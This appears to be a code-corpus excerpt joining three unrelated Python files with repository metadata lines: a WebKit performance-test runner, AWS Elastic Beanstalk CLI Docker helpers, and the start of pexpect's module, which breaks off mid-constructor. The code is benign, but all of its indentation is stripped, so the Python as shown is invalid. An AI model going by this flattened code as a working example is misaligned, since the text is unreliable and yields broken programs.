# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Run Inspector's perf tests in perf mode."""
import os
import json
import logging
import optparse
import time
import datetime
from webkitpy.common import find_files
from webkitpy.common.checkout.scm.detection import SCMDetector
from webkitpy.common.config.urls import view_source_url
from webkitpy.common.host import Host
from webkitpy.common.net.file_uploader import FileUploader
from webkitpy.performance_tests.perftest import PerfTestFactory
from webkitpy.performance_tests.perftest import DEFAULT_TEST_RUNNER_COUNT
_log = logging.getLogger(__name__)
class PerfTestsRunner(object):
_default_branch = 'webkit-trunk'
EXIT_CODE_BAD_BUILD = -1
EXIT_CODE_BAD_SOURCE_JSON = -2
EXIT_CODE_BAD_MERGE = -3
EXIT_CODE_FAILED_UPLOADING = -4
EXIT_CODE_BAD_PREPARATION = -5
_DEFAULT_JSON_FILENAME = 'PerformanceTestsResults.json'
def __init__(self, args=None, port=None):
self._options, self._args = PerfTestsRunner._parse_args(args)
if port:
self._port = port
self._host = self._port.host
else:
self._host = Host()
self._port = self._host.port_factory.get(self._options.platform, self._options)
self._host.initialize_scm()
self._webkit_base_dir_len = len(self._port.webkit_base())
self._base_path = self._port.perf_tests_dir()
self._timestamp = time.time()
self._utc_timestamp = datetime.datetime.utcnow()
@staticmethod
def _parse_args(args=None):
def _expand_path(option, opt_str, value, parser):
path = os.path.expandvars(os.path.expanduser(value))
setattr(parser.values, option.dest, path)
perf_option_list = [
optparse.make_option('--debug', action='store_const', const='Debug', dest="configuration",
help='Set the configuration to Debug'),
optparse.make_option('--release', action='store_const', const='Release', dest="configuration",
help='Set the configuration to Release'),
optparse.make_option("--platform",
help="Specify port/platform being tested (i.e. chromium-mac)"),
optparse.make_option("--builder-name",
help=("The name of the builder shown on the waterfall running this script e.g. google-mac-2.")),
optparse.make_option("--build-number",
help=("The build number of the builder running this script.")),
optparse.make_option("--build", dest="build", action="store_true", default=True,
help="Check to ensure the DumpRenderTree build is up-to-date (default)."),
optparse.make_option("--no-build", dest="build", action="store_false",
help="Don't check to see if the DumpRenderTree build is up-to-date."),
optparse.make_option("--build-directory",
help="Path to the directory under which build files are kept (should not include configuration)"),
optparse.make_option("--time-out-ms", default=600 * 1000,
help="Set the timeout for each test"),
optparse.make_option("--no-results", action="store_false", dest="generate_results", default=True,
help="Do no generate results JSON and results page."),
optparse.make_option("--output-json-path", action='callback', callback=_expand_path, type="str",
help="Path to generate a JSON file at; may contain previous results if it already exists."),
optparse.make_option("--reset-results", action="store_true",
help="Clears the content in the generated JSON file before adding the results."),
optparse.make_option("--slave-config-json-path", action='callback', callback=_expand_path, type="str",
help="Only used on bots. Path to a slave configuration file."),
optparse.make_option("--description",
help="Add a description to the output JSON file if one is generated"),
optparse.make_option("--no-show-results", action="store_false", default=True, dest="show_results",
help="Don't launch a browser with results after the tests are done"),
optparse.make_option("--test-results-server",
help="Upload the generated JSON file to the specified server when --output-json-path is present."),
optparse.make_option("--webkit-test-runner", "-2", action="store_true",
help="Use WebKitTestRunner rather than DumpRenderTree."),
optparse.make_option("--replay", dest="replay", action="store_true", default=False,
help="Run replay tests."),
optparse.make_option("--force", dest="use_skipped_list", action="store_false", default=True,
help="Run all tests, including the ones in the Skipped list."),
optparse.make_option("--profile", action="store_true",
help="Output per-test profile information."),
optparse.make_option("--profiler", action="store",
help="Output per-test profile information, using the specified profiler."),
optparse.make_option("--additional-drt-flag", action="append",
default=[], help="Additional command line flag to pass to DumpRenderTree "
"Specify multiple times to add multiple flags."),
optparse.make_option("--driver-name", type="string",
help="Alternative DumpRenderTree binary to use"),
optparse.make_option("--repeat", default=1, type="int",
help="Specify number of times to run test set (default: 1)."),
optparse.make_option("--test-runner-count", default=DEFAULT_TEST_RUNNER_COUNT, type="int",
help="Specify number of times to invoke test runner for each performance test."),
]
return optparse.OptionParser(option_list=(perf_option_list)).parse_args(args)
def _collect_tests(self):
test_extensions = ['.html', '.svg']
if self._options.replay:
test_extensions.append('.replay')
def _is_test_file(filesystem, dirname, filename):
return filesystem.splitext(filename)[1] in test_extensions
filesystem = self._host.filesystem
paths = []
for arg in self._args:
if filesystem.exists(filesystem.join(self._base_path, arg)):
paths.append(arg)
else:
relpath = filesystem.relpath(arg, self._base_path)
if filesystem.exists(filesystem.join(self._base_path, relpath)):
paths.append(filesystem.normpath(relpath))
else:
_log.warn('Path was not found:' + arg)
skipped_directories = set(['.svn', 'resources'])
test_files = find_files.find(filesystem, self._base_path, paths, skipped_directories, _is_test_file)
tests = []
for path in test_files:
relative_path = filesystem.relpath(path, self._base_path).replace('\\', '/')
if self._options.use_skipped_list and self._port.skips_perf_test(relative_path) and filesystem.normpath(relative_path) not in paths:
continue
test = PerfTestFactory.create_perf_test(self._port, relative_path, path, test_runner_count=self._options.test_runner_count)
tests.append(test)
return tests
def run(self):
if not self._port.check_build(needs_http=False):
_log.error("Build not up to date for %s" % self._port._path_to_driver())
return self.EXIT_CODE_BAD_BUILD
run_count = 0
repeat = self._options.repeat
while (run_count < repeat):
run_count += 1
tests = self._collect_tests()
runs = ' (Run %d of %d)' % (run_count, repeat) if repeat > 1 else ''
_log.info("Running %d tests%s" % (len(tests), runs))
for test in tests:
if not test.prepare(self._options.time_out_ms):
return self.EXIT_CODE_BAD_PREPARATION
unexpected = self._run_tests_set(sorted(list(tests), key=lambda test: test.test_name()))
if self._options.generate_results and not self._options.profile:
exit_code = self._generate_results()
if exit_code:
return exit_code
if self._options.generate_results and not self._options.profile:
test_results_server = self._options.test_results_server
if test_results_server and not self._upload_json(test_results_server, self._output_json_path()):
return self.EXIT_CODE_FAILED_UPLOADING
if self._options.show_results:
self._port.show_results_html_file(self._results_page_path())
return unexpected
def _output_json_path(self):
output_json_path = self._options.output_json_path
if output_json_path:
return output_json_path
return self._host.filesystem.join(self._port.perf_results_directory(), self._DEFAULT_JSON_FILENAME)
def _results_page_path(self):
return self._host.filesystem.splitext(self._output_json_path())[0] + '.html'
def _generate_results(self):
options = self._options
output_json_path = self._output_json_path()
output = self._generate_results_dict(self._timestamp, options.description, options.platform, options.builder_name, options.build_number)
if options.slave_config_json_path:
output = self._merge_slave_config_json(options.slave_config_json_path, output)
if not output:
return self.EXIT_CODE_BAD_SOURCE_JSON
output = self._merge_outputs_if_needed(output_json_path, output)
if not output:
return self.EXIT_CODE_BAD_MERGE
filesystem = self._host.filesystem
json_output = json.dumps(output)
filesystem.write_text_file(output_json_path, json_output)
template_path = filesystem.join(self._port.perf_tests_dir(), 'resources/results-template.html')
template = filesystem.read_text_file(template_path)
absolute_path_to_trunk = filesystem.dirname(self._port.perf_tests_dir())
results_page = template.replace('%AbsolutePathToWebKitTrunk%', absolute_path_to_trunk)
results_page = results_page.replace('%PeformanceTestsResultsJSON%', json_output)
filesystem.write_text_file(self._results_page_path(), results_page)
def _generate_results_dict(self, timestamp, description, platform, builder_name, build_number):
revisions = {}
for (name, path) in self._port.repository_paths():
scm = SCMDetector(self._host.filesystem, self._host.executive).detect_scm_system(path) or self._host.scm()
revision = scm.svn_revision(path)
revisions[name] = {'revision': revision, 'timestamp': scm.timestamp_of_revision(path, revision)}
meta_info = {
'description': description,
'buildTime': self._datetime_in_ES5_compatible_iso_format(self._utc_timestamp),
'platform': platform,
'revisions': revisions,
'builderName': builder_name,
'buildNumber': int(build_number) if build_number else None}
contents = {'tests': {}}
for key, value in meta_info.items():
if value:
contents[key] = value
for test, metrics in self._results:
for metric_name, iteration_values in metrics.iteritems():
if not isinstance(iteration_values, list): # We can't reports results without individual measurements.
continue
tests = contents['tests']
path = test.test_name_without_file_extension().split('/')
for i in range(0, len(path)):
is_last_token = i + 1 == len(path)
url = view_source_url('PerformanceTests/' + (test.test_name() if is_last_token else '/'.join(path[0:i + 1])))
tests.setdefault(path[i], {'url': url})
current_test = tests[path[i]]
if is_last_token:
current_test.setdefault('metrics', {})
assert metric_name not in current_test['metrics']
current_test['metrics'][metric_name] = {'current': iteration_values}
else:
current_test.setdefault('tests', {})
tests = current_test['tests']
return contents
@staticmethod
def _datetime_in_ES5_compatible_iso_format(datetime):
return datetime.strftime('%Y-%m-%dT%H:%M:%S.%f')
def _merge_slave_config_json(self, slave_config_json_path, contents):
if not self._host.filesystem.isfile(slave_config_json_path):
_log.error("Missing slave configuration JSON file: %s" % slave_config_json_path)
return None
try:
slave_config_json = self._host.filesystem.open_text_file_for_reading(slave_config_json_path)
slave_config = json.load(slave_config_json)
for key in slave_config:
contents['builder' + key.capitalize()] = slave_config[key]
return contents
except Exception, error:
_log.error("Failed to merge slave configuration JSON file %s: %s" % (slave_config_json_path, error))
return None
def _merge_outputs_if_needed(self, output_json_path, output):
if self._options.reset_results or not self._host.filesystem.isfile(output_json_path):
return [output]
try:
existing_outputs = json.loads(self._host.filesystem.read_text_file(output_json_path))
return existing_outputs + [output]
except Exception, error:
_log.error("Failed to merge output JSON file %s: %s" % (output_json_path, error))
return None
def _upload_json(self, test_results_server, json_path, host_path="/api/report", file_uploader=FileUploader):
url = "https://%s%s" % (test_results_server, host_path)
uploader = file_uploader(url, 120)
try:
response = uploader.upload_single_text_file(self._host.filesystem, 'application/json', json_path)
except Exception, error:
_log.error("Failed to upload JSON file to %s in 120s: %s" % (url, error))
return False
response_body = [line.strip('\n') for line in response]
if response_body != ['OK']:
try:
parsed_response = json.loads('\n'.join(response_body))
except:
_log.error("Uploaded JSON to %s but got a bad response:" % url)
for line in response_body:
_log.error(line)
return False
if parsed_response.get('status') != 'OK':
_log.error("Uploaded JSON to %s but got an error:" % url)
_log.error(json.dumps(parsed_response, indent=4))
return False
_log.info("JSON file uploaded to %s." % url)
return True
def _run_tests_set(self, tests):
result_count = len(tests)
failures = 0
self._results = []
for i, test in enumerate(tests):
_log.info('Running %s (%d of %d)' % (test.test_name(), i + 1, len(tests)))
start_time = time.time()
metrics = test.run(self._options.time_out_ms)
if metrics:
self._results.append((test, metrics))
else:
failures += 1
_log.error('FAILED')
_log.info('Finished: %f s' % (time.time() - start_time))
_log.info('')
return failures
| bsd-3-clause |
quickresolve/accel.ai | flask-aws/lib/python2.7/site-packages/ebcli/containers/commands.py | 5 | 8658 | # Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import os
import json
import sys
from botocore.compat import six
from cement.utils.misc import minimal_logger
from ..core import fileoperations
from ..lib import utils
from ..objects.exceptions import ValidationError, CommandError
from ..resources.strings import strings
EXPOSE_CMD = 'EXPOSE'
FROM_CMD = 'FROM'
LATEST_TAG = ':latest'
NETWORK_SETTINGS_KEY = 'NetworkSettings'
PORTS_KEY = 'Ports'
HOST_PORT_KEY = 'HostPort'
STATE_KEY = 'State'
RUNNING_KEY = 'Running'
LOG = minimal_logger(__name__)
def pull_img(full_docker_path):
"""
Pulls a base image found in Dockerfile.
:param full_docker_path: str: path to the Dockerfile
:return: None
"""
img = _get_base_img(full_docker_path)
if not _is_tag_specified(img):
img += LATEST_TAG
_pull_img(img)
def build_img(docker_path, file_path=None):
"""
Builds a docker image using Dockerfile found in docker path.
:param docker_path: str: path of dir containing the Dockerfile
:param file_path: str: optional name of Dockerfile
:return: str: id of the new image
"""
opts = ['-f', file_path] if file_path else []
args = ['docker', 'build'] + opts + [docker_path]
output = _run_live(args)
return _grab_built_image_id(output)
def run_container(full_docker_path, image_id, host_port=None,
envvars_map=None, volume_map=None, name=None):
"""
Runs a Docker container. Container port comes from the Dockerfile,
which is mapped to the given host port.
:param full_docker_path: str: path to the Dockerfile
:param image_id: str: id of the image being used to run
:host_port: str: optional host port. Same as container port by default
:envvars_map: dict: optional key-val map of environment variables
:volume_map: dict: optional key-val map of host-container volume mounts
:name: str: optional name to be assigned to the container
:return: None
"""
container_port = _get_container_port(full_docker_path)
if host_port is None:
host_port = container_port
_run_container(image_id, container_port, host_port, envvars_map,
volume_map, name)
def rm_container(container_id, force=False):
"""
Remove a container.
:param container_id: str: the container's id or name
:param force: bool: force the removal of the container (SIGKILL)
:return None
"""
force_arg = ['-f'] if force else []
args = ['docker', 'rm'] + force_arg + [container_id]
_run_quiet(args)
def up(compose_path=None, allow_insecure_ssl=False):
"""
Build and run the entire app using services defined in docker-compose.yml.
:param compose_path: str: optional alternate path to docker-compose.yml
:param allow_insecure_ssl: bool: allow insecure connection to docker registry
:return None
"""
file_opt = ['-f', '{}'.format(compose_path)] if compose_path else []
insecure_ssl_opt = ['--allow-insecure-ssl'] if allow_insecure_ssl else []
args = file_opt + ['up'] + insecure_ssl_opt
LOG.debug(args)
_compose_run(args)
def _compose_run(args):
from ebcli.bundled._compose.cli.main import main as compose_run
compose_run(*args)
def get_container_lowlvl_info(container_id):
"""
Get a running container's low level info.
:param container_id: str: the running container's id or name
:return dict
"""
args = ['docker', 'inspect', container_id]
info = json.loads(_run_quiet(args))
return info[0]
def is_container_existent(container_id):
"""
Return whether container exists.
:param container_id: str: the id or name of the container to check
:return bool
"""
try:
get_container_lowlvl_info(container_id)
return True
except CommandError:
return False
def is_running(container_id):
"""
Return whether container is currently running.
:param container_id: str: the id or name of the container to check
:return bool
"""
try:
info = get_container_lowlvl_info(container_id)
return info[STATE_KEY][RUNNING_KEY]
except CommandError:
return False
def get_exposed_hostports(container_id):
"""
Get the host ports we exposed when we ran this container.
:param container_id: str: the id or name of the running container
:return list
"""
# Since we ran the container, we can guarantee that
# one host port and one or more container ports are exposed.
# Example of port_map:
#
# {'4848/tcp': None,
# '8080/tcp': [{'HostPort': '8080', 'HostIp': '0.0.0.0'}],
# '8181/tcp': None}
try:
port_map = _get_network_settings(container_id)[PORTS_KEY] or {}
return utils.flatten([[p[HOST_PORT_KEY] for p in ports]
for ports in six.itervalues(port_map) if ports])
except CommandError: # Not running
return []
def version():
args = ['docker', '--version']
version_str = _run_quiet(args)
# Format: Docker version 1.5.0, build a8a31ef
return version_str.split()[2].strip(',')
def compose_version():
args = ['docker-compose', '--version']
# Format: docker-compose 1.1.0
return _run_quiet(args).split()[-1]
def _get_network_settings(container_id):
info = get_container_lowlvl_info(container_id)
return info[NETWORK_SETTINGS_KEY]
def _pull_img(img):
args = ['docker', 'pull', img]
return _run_live(args)
def _grab_built_image_id(build_output):
last_line = build_output.split()[-1]
image_id = last_line.split()[-1]
return image_id
def _run_container(image_id, container_port, host_port, envvars_map,
volume_map, name):
port_mapping = '{}:{}'.format(host_port, container_port)
interactive_opt = ['-i']
pseudotty_opt = ['-t']
rm_container_on_exit_opt = ['--rm']
port_opt = ['-p', port_mapping]
envvar_opt = _get_env_opts(envvars_map)
volume_opt = _get_volume_opts(volume_map)
name_opt = ['--name', name] if name else []
opts = (interactive_opt + pseudotty_opt + rm_container_on_exit_opt +
port_opt + envvar_opt + volume_opt + name_opt)
args = ['docker', 'run'] + opts + [image_id]
return _run_live(args)
def _get_container_port(full_docker_path):
return _fst_match_in_dockerfile(full_docker_path,
lambda s: s.startswith(EXPOSE_CMD),
strings['local.run.noportexposed'])[1]
def _get_base_img(full_docker_path):
return _fst_match_in_dockerfile(full_docker_path,
lambda s: s.startswith(FROM_CMD),
strings['local.run.nobaseimg'])[1]
def _fst_match_in_dockerfile(full_docker_path, predicate, not_found_error_msg):
raw_lines = fileoperations.readlines_from_text_file(full_docker_path)
stripped_lines = (x.strip() for x in raw_lines)
try:
line = next(x for x in stripped_lines if predicate(x))
return line.split()
except StopIteration:
raise ValidationError(not_found_error_msg)
def _is_tag_specified(img_name):
return ':' in img_name
def _get_env_opts(envvars_map):
return _get_opts(envvars_map, '--env', '{}={}')
def _get_volume_opts(volume_map):
return _get_opts(volume_map, '-v', '{}:{}')
def _get_opts(_map, opt_name, val_format):
_map = _map or {}
kv_pairs = six.iteritems(_map)
return utils.flatten([[opt_name, val_format.format(k, v)] for k, v
in kv_pairs])
def _run_quiet(args):
try:
return utils.exec_cmd_quiet(args)
except CommandError as e:
_handle_command_error(e)
def _run_live(args):
try:
return utils.exec_cmd_live_output(args)
except CommandError as e:
_handle_command_error(e)
def _handle_command_error(e):
socket_perm_msg = "dial unix /var/run/docker.sock: permission denied."
if socket_perm_msg in e.output:
raise CommandError(strings['local.run.socketperms'], e.output, e.code)
else:
raise CommandError
| mit |
yasoob/PythonRSSReader | venv/lib/python2.7/dist-packages/pexpect/__init__.py | 1 | 83018 | '''Pexpect is a Python module for spawning child applications and controlling
them automatically. Pexpect can be used for automating interactive applications
such as ssh, ftp, passwd, telnet, etc. It can be used to a automate setup
scripts for duplicating software package installations on different servers. It
can be used for automated software testing. Pexpect is in the spirit of Don
Libes' Expect, but Pexpect is pure Python. Other Expect-like modules for Python
require TCL and Expect or require C extensions to be compiled. Pexpect does not
use C, Expect, or TCL extensions. It should work on any platform that supports
the standard Python pty module. The Pexpect interface focuses on ease of use so
that simple tasks are easy.
There are two main interfaces to the Pexpect system; these are the function,
run() and the class, spawn. The spawn class is more powerful. The run()
function is simpler than spawn, and is good for quickly calling program. When
you call the run() function it executes a given program and then returns the
output. This is a handy replacement for os.system().
For example::
pexpect.run('ls -la')
The spawn class is the more powerful interface to the Pexpect system. You can
use this to spawn a child program then interact with it by sending input and
expecting responses (waiting for patterns in the child's output).
For example::
child = pexpect.spawn('scp foo [email protected]:.')
child.expect('Password:')
child.sendline(mypassword)
This works even for commands that ask for passwords or other input outside of
the normal stdio streams. For example, ssh reads input directly from the TTY
device which bypasses stdin.
Credits: Noah Spurrier, Richard Holden, Marco Molteni, Kimberley Burchett,
Robert Stone, Hartmut Goebel, Chad Schroeder, Erick Tryzelaar, Dave Kirby, Ids
vander Molen, George Todd, Noel Taylor, Nicolas D. Cesar, Alexander Gattin,
Jacques-Etienne Baudoux, Geoffrey Marshall, Francisco Lourenco, Glen Mabey,
Karthik Gurusamy, Fernando Perez, Corey Minyard, Jon Cohen, Guillaume
Chazarain, Andrew Ryan, Nick Craig-Wood, Andrew Stone, Jorgen Grahn, John
Spiegel, Jan Grant, and Shane Kerr. Let me know if I forgot anyone.
Pexpect is free, open source, and all that good stuff.
http://pexpect.sourceforge.net/
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2012, Noah Spurrier <[email protected]>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
try:
import os
import sys
import time
import select
import re
import struct
import resource
import types
import pty
import tty
import termios
import fcntl
import errno
import traceback
import signal
import codecs
except ImportError: # pragma: no cover
err = sys.exc_info()[1]
raise ImportError(str(err) + '''
A critical module was not found. Probably this operating system does not
support it. Pexpect is intended for UNIX-like operating systems.''')
__version__ = '3.1'
__revision__ = ''
__all__ = ['ExceptionPexpect', 'EOF', 'TIMEOUT', 'spawn', 'spawnu', 'run', 'runu',
'which', 'split_command_line', '__version__', '__revision__']
PY3 = (sys.version_info[0] >= 3)
# Exception classes used by this module.
class ExceptionPexpect(Exception):
'''Base class for all exceptions raised by this module.
'''
def __init__(self, value):
super(ExceptionPexpect, self).__init__(value)
self.value = value
def __str__(self):
return str(self.value)
def get_trace(self):
'''This returns an abbreviated stack trace with lines that only concern
the caller. In other words, the stack trace inside the Pexpect module
is not included. '''
tblist = traceback.extract_tb(sys.exc_info()[2])
tblist = [item for item in tblist if 'pexpect/__init__' not in item[0]]
tblist = traceback.format_list(tblist)
return ''.join(tblist)
class EOF(ExceptionPexpect):
'''Raised when EOF is read from a child.
This usually means the child has exited.'''
class TIMEOUT(ExceptionPexpect):
'''Raised when a read time exceeds the timeout. '''
##class TIMEOUT_PATTERN(TIMEOUT):
## '''Raised when the pattern match time exceeds the timeout.
## This is different than a read TIMEOUT because the child process may
## give output, thus never give a TIMEOUT, but the output
## may never match a pattern.
## '''
##class MAXBUFFER(ExceptionPexpect):
## '''Raised when a buffer fills before matching an expected pattern.'''
def run(command, timeout=-1, withexitstatus=False, events=None,
extra_args=None, logfile=None, cwd=None, env=None):
'''
This function runs the given command; waits for it to finish; then
returns all output as a string. STDERR is included in output. If the full
path to the command is not given then the path is searched.
Note that lines are terminated by CR/LF (\\r\\n) combination even on
UNIX-like systems because this is the standard for pseudottys. If you set
'withexitstatus' to true, then run will return a tuple of (command_output,
exitstatus). If 'withexitstatus' is false then this returns just
command_output.
The run() function can often be used instead of creating a spawn instance.
For example, the following code uses spawn::
from pexpect import *
child = spawn('scp foo [email protected]:.')
child.expect('(?i)password')
child.sendline(mypassword)
The previous code can be replace with the following::
from pexpect import *
run('scp foo [email protected]:.', events={'(?i)password': mypassword})
**Examples**
Start the apache daemon on the local machine::
from pexpect import *
run("/usr/local/apache/bin/apachectl start")
Check in a file using SVN::
from pexpect import *
run("svn ci -m 'automatic commit' my_file.py")
Run a command and capture exit status::
from pexpect import *
(command_output, exitstatus) = run('ls -l /bin', withexitstatus=1)
The following will run SSH and execute 'ls -l' on the remote machine. The
password 'secret' will be sent if the '(?i)password' pattern is ever seen::
run("ssh [email protected] 'ls -l'",
events={'(?i)password':'secret\\n'})
This will start mencoder to rip a video from DVD. This will also display
progress ticks every 5 seconds as it runs. For example::
from pexpect import *
def print_ticks(d):
print d['event_count'],
run("mencoder dvd://1 -o video.avi -oac copy -ovc copy",
events={TIMEOUT:print_ticks}, timeout=5)
The 'events' argument should be a dictionary of patterns and responses.
Whenever one of the patterns is seen in the command out run() will send the
associated response string. Note that you should put newlines in your
string if Enter is necessary. The responses may also contain callback
functions. Any callback is function that takes a dictionary as an argument.
The dictionary contains all the locals from the run() function, so you can
access the child spawn object or any other variable defined in run()
(event_count, child, and extra_args are the most useful). A callback may
return True to stop the current run process otherwise run() continues until
the next event. A callback may also return a string which will be sent to
the child. 'extra_args' is not used by directly run(). It provides a way to
pass data to a callback function through run() through the locals
dictionary passed to a callback.
'''
return _run(command, timeout=timeout, withexitstatus=withexitstatus,
events=events, extra_args=extra_args, logfile=logfile, cwd=cwd,
env=env, _spawn=spawn)
def runu(command, timeout=-1, withexitstatus=False, events=None,
extra_args=None, logfile=None, cwd=None, env=None, **kwargs):
"""This offers the same interface as :func:`run`, but using unicode.
Like :class:`spawnu`, you can pass ``encoding`` and ``errors`` parameters,
which will be used for both input and output.
"""
return _run(command, timeout=timeout, withexitstatus=withexitstatus,
events=events, extra_args=extra_args, logfile=logfile, cwd=cwd,
env=env, _spawn=spawnu, **kwargs)
def _run(command, timeout, withexitstatus, events, extra_args, logfile, cwd,
env, _spawn, **kwargs):
if timeout == -1:
child = _spawn(command, maxread=2000, logfile=logfile, cwd=cwd, env=env,
**kwargs)
else:
child = _spawn(command, timeout=timeout, maxread=2000, logfile=logfile,
cwd=cwd, env=env, **kwargs)
if events is not None:
patterns = list(events.keys())
responses = list(events.values())
else:
# This assumes EOF or TIMEOUT will eventually cause run to terminate.
patterns = None
responses = None
child_result_list = []
event_count = 0
while True:
try:
index = child.expect(patterns)
if isinstance(child.after, child.allowed_string_types):
child_result_list.append(child.before + child.after)
else:
# child.after may have been a TIMEOUT or EOF,
# which we don't want appended to the list.
child_result_list.append(child.before)
if isinstance(responses[index], child.allowed_string_types):
child.send(responses[index])
elif isinstance(responses[index], types.FunctionType):
callback_result = responses[index](locals())
sys.stdout.flush()
if isinstance(callback_result, child.allowed_string_types):
child.send(callback_result)
elif callback_result:
break
else:
raise TypeError('The callback must be a string or function.')
event_count = event_count + 1
except TIMEOUT:
child_result_list.append(child.before)
break
except EOF:
child_result_list.append(child.before)
break
child_result = child.string_type().join(child_result_list)
if withexitstatus:
child.close()
return (child_result, child.exitstatus)
else:
return child_result
class spawn(object):
'''This is the main class interface for Pexpect. Use this class to start
and control child applications. '''
string_type = bytes
if PY3:
allowed_string_types = (bytes, str)
@staticmethod
def _chr(c):
return bytes([c])
linesep = os.linesep.encode('ascii')
@staticmethod
def write_to_stdout(b):
try:
return sys.stdout.buffer.write(b)
except AttributeError:
# If stdout has been replaced, it may not have .buffer
return sys.stdout.write(b.decode('ascii', 'replace'))
else:
allowed_string_types = (basestring,) # analysis:ignore
_chr = staticmethod(chr)
linesep = os.linesep
write_to_stdout = sys.stdout.write
encoding = None
def __init__(self, command, args=[], timeout=30, maxread=2000,
searchwindowsize=None, logfile=None, cwd=None, env=None,
ignore_sighup=True):
'''This is the constructor. The command parameter may be a string that
includes a command and any arguments to the command. For example::
child = pexpect.spawn('/usr/bin/ftp')
child = pexpect.spawn('/usr/bin/ssh [email protected]')
child = pexpect.spawn('ls -latr /tmp')
You may also construct it with a list of arguments like so::
child = pexpect.spawn('/usr/bin/ftp', [])
child = pexpect.spawn('/usr/bin/ssh', ['[email protected]'])
child = pexpect.spawn('ls', ['-latr', '/tmp'])
After this the child application will be created and will be ready to
talk to. For normal use, see expect() and send() and sendline().
Remember that Pexpect does NOT interpret shell meta characters such as
redirect, pipe, or wild cards (``>``, ``|``, or ``*``). This is a
common mistake. If you want to run a command and pipe it through
another command then you must also start a shell. For example::
child = pexpect.spawn('/bin/bash -c "ls -l | grep LOG > logs.txt"')
child.expect(pexpect.EOF)
The second form of spawn (where you pass a list of arguments) is useful
in situations where you wish to spawn a command and pass it its own
argument list. This can make syntax more clear. For example, the
following is equivalent to the previous example::
shell_cmd = 'ls -l | grep LOG > logs.txt'
child = pexpect.spawn('/bin/bash', ['-c', shell_cmd])
child.expect(pexpect.EOF)
The maxread attribute sets the read buffer size. This is maximum number
of bytes that Pexpect will try to read from a TTY at one time. Setting
the maxread size to 1 will turn off buffering. Setting the maxread
value higher may help performance in cases where large amounts of
output are read back from the child. This feature is useful in
conjunction with searchwindowsize.
The searchwindowsize attribute sets the how far back in the incoming
seach buffer Pexpect will search for pattern matches. Every time
Pexpect reads some data from the child it will append the data to the
incoming buffer. The default is to search from the beginning of the
incoming buffer each time new data is read from the child. But this is
very inefficient if you are running a command that generates a large
amount of data where you want to match. The searchwindowsize does not
affect the size of the incoming data buffer. You will still have
access to the full buffer after expect() returns.
The logfile member turns on or off logging. All input and output will
be copied to the given file object. Set logfile to None to stop
logging. This is the default. Set logfile to sys.stdout to echo
everything to standard output. The logfile is flushed after each write.
Example log input and output to a file::
child = pexpect.spawn('some_command')
fout = file('mylog.txt','w')
child.logfile = fout
Example log to stdout::
child = pexpect.spawn('some_command')
child.logfile = sys.stdout
The logfile_read and logfile_send members can be used to separately log
the input from the child and output sent to the child. Sometimes you
don't want to see everything you write to the child. You only want to
log what the child sends back. For example::
child = pexpect.spawn('some_command')
child.logfile_read = sys.stdout
To separately log output sent to the child use logfile_send::
self.logfile_send = fout
If ``ignore_sighup`` is True, the child process will ignore SIGHUP
signals. For now, the default is True, to preserve the behaviour of
earlier versions of Pexpect, but you should pass this explicitly if you
want to rely on it.
The delaybeforesend helps overcome a weird behavior that many users
were experiencing. The typical problem was that a user would expect() a
"Password:" prompt and then immediately call sendline() to send the
password. The user would then see that their password was echoed back
to them. Passwords don't normally echo. The problem is caused by the
fact that most applications print out the "Password" prompt and then
turn off stdin echo, but if you send your password before the
application turned off echo, then you get your password echoed.
Normally this wouldn't be a problem when interacting with a human at a
real keyboard. If you introduce a slight delay just before writing then
this seems to clear up the problem. This was such a common problem for
many users that I decided that the default pexpect behavior should be
to sleep just before writing to the child application. 1/20th of a
second (50 ms) seems to be enough to clear up the problem. You can set
delaybeforesend to 0 to return to the old behavior. Most Linux machines
don't like this to be below 0.03. I don't know why.
Note that spawn is clever about finding commands on your path.
It uses the same logic that "which" uses to find executables.
If you wish to get the exit status of the child you must call the
close() method. The exit or signal status of the child will be stored
in self.exitstatus or self.signalstatus. If the child exited normally
then exitstatus will store the exit return code and signalstatus will
be None. If the child was terminated abnormally with a signal then
signalstatus will store the signal value and exitstatus will be None.
If you need more detail you can also read the self.status member which
stores the status returned by os.waitpid. You can interpret this using
os.WIFEXITED/os.WEXITSTATUS or os.WIFSIGNALED/os.TERMSIG. '''
self.STDIN_FILENO = pty.STDIN_FILENO
self.STDOUT_FILENO = pty.STDOUT_FILENO
self.STDERR_FILENO = pty.STDERR_FILENO
self.stdin = sys.stdin
self.stdout = sys.stdout
self.stderr = sys.stderr
self.searcher = None
self.ignorecase = False
self.before = None
self.after = None
self.match = None
self.match_index = None
self.terminated = True
self.exitstatus = None
self.signalstatus = None
# status returned by os.waitpid
self.status = None
self.flag_eof = False
self.pid = None
# the chile filedescriptor is initially closed
self.child_fd = -1
self.timeout = timeout
self.delimiter = EOF
self.logfile = logfile
# input from child (read_nonblocking)
self.logfile_read = None
# output to send (send, sendline)
self.logfile_send = None
# max bytes to read at one time into buffer
self.maxread = maxread
# This is the read buffer. See maxread.
self.buffer = self.string_type()
# Data before searchwindowsize point is preserved, but not searched.
